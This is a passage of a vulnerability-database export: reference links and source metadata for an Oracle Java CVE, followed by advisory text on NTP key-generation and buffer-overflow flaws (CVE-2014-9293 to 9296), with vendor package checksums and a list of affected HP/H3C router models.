"https://nvd.nist.gov/vuln/detail/cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4247" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6511" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4265" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2402" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6527" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4227" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4252" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4244" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4262" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2490" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4264" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4288" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2428" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4268" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4220" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2413" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6515" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5887" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0878.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5910" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0982.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0376" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0368" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5884" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0423" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0410" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0424" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0416" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5888" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5899" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5896" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0387" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2403" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0461" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0452" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0455" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1876" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0456" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2397" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2421" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://blog.fuseyism.com/index.php/2014/04/16/security-icedtea-2-4-7-for-openjdk-7-released/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2413" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0453" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2402" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2412" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2414" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0460" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0429" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0454" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2423" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2427" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0458" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0451" }, { "trust": 0.1, "url": "http://advisories.mageia.org/mgasa-2014-0189.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0446" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0459" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0457" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2398" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4218" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4209" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0509.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0408.html" } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67953" }, { "date": "2014-04-15T00:00:00", "db": "BID", "id": "66916" }, { "date": "2014-05-14T15:09:44", "db": "PACKETSTORM", "id": "126611" }, { "date": "2014-04-16T20:42:08", "db": "PACKETSTORM", "id": "126182" }, { "date": "2015-02-16T17:24:02", "db": "PACKETSTORM", "id": "130400" }, { "date": "2014-07-29T22:17:21", "db": "PACKETSTORM", "id": "127655" }, { "date": "2014-08-20T15:19:26", "db": "PACKETSTORM", "id": "127938" }, { "date": "2014-05-19T03:11:59", "db": "PACKETSTORM", "id": "126664" }, { "date": "2014-08-20T15:19:50", "db": "PACKETSTORM", "id": "127939" }, { "date": "2014-05-15T21:38:36", "db": "PACKETSTORM", "id": "126630" }, { "date": "2014-04-16T20:42:18", "db": "PACKETSTORM", "id": "126183" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-275" }, { "date": "2014-04-16T01:55:09.993000", "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67953" }, { "date": "2015-05-07T17:18:00", "db": "BID", "id": "66916" }, { "date": "2020-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-275" }, { "date": "2022-05-13T14:57:20.570000", "db": "NVD", "id": "CVE-2014-0460" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 1.1 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE/JRockit/Java SE Embedded Security hole", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 0.6 } }
var-201412-0615
Vulnerability from variot
The config_auth function in ntpd in NTP before 4.2.7p11, when an auth key is not configured, improperly generates a key, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability types by CWE-332: Insufficient Entropy in PRNG (PRNG Insufficient entropy in ) Has been identified. http://cwe.mitre.org/data/definitions/332.htmlBrute force attack by a third party (Brute force attack) Could be used to break cryptographic protection mechanisms. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a denial-of-service condition. Network Time Protocol 4.2.7 and prior are vulnerable. NTP is prone to a predictable random number generator weakness. An attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server.
A remote unauthenticated attacker may craft special packets that trigger buffer overflows in the ntpd functions crypto_recv() (when using autokey authentication), ctl_putdata(), and configure().
A section of code in ntpd handling a rare error is missing a return statement, therefore processing did not stop when the error was encountered. This situation may be exploitable by an attacker (CVE-2014-9296).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 http://advisories.mageia.org/MGASA-2014-0541.html
Updated Packages:
Mandriva Business Server 1/X86_64: 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security.
References:
SSRT101878 CVE-2014-9293 CVE-2014-9294 CVE-2014-9295
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
See the RESOLUTION section for a list of impacted hardware and Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX versions. Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted CVE #
8800 (Comware 5) R3627P04 JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main Processing Unit
CVE-2014-9295
A6600 (Comware 5) R3303P18 JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6602 (Comware 5) R3303P18 JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6800 (Comware 5) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
MSR20 (Comware 5) R2513P45 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router
CVE-2014-9295
MSR20-1X (Comware 5) R2513P45 JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR 20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R), H3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W (0235A32G) CVE-2014-9295
MSR 30 (Comware 5) R2513P45 JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40 Multi-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP MSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service Router, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239), H3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60 (0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V) CVE-2014-9295
MSR 30-16 (Comware 5) R2513P45 JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16 Multi-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router, H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238) CVE-2014-9295
MSR 30-1X (Comware 5) R2513P45 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L) CVE-2014-9295
MSR 50 (Comware 5) R2513P45 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L) CVE-2014-9295
MSR 50-G2 (Comware 5) R2513P45 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295
MSR 9XX (Comware 5) R2513P45 JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router, JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA), JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) CVE-2014-9295
MSR 93X (Comware 5) R2513P45 JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP MSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP MSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router, JG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930 4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G LTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router N/A CVE-2014-9295
MSR1000 (Comware 5) R2513P45 JG732A HP MSR1003-8 AC Router N/A CVE-2014-9295
MSR20 (Comware 5 - Low Encryption SW) R2513L61 JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326) CVE-2014-9295
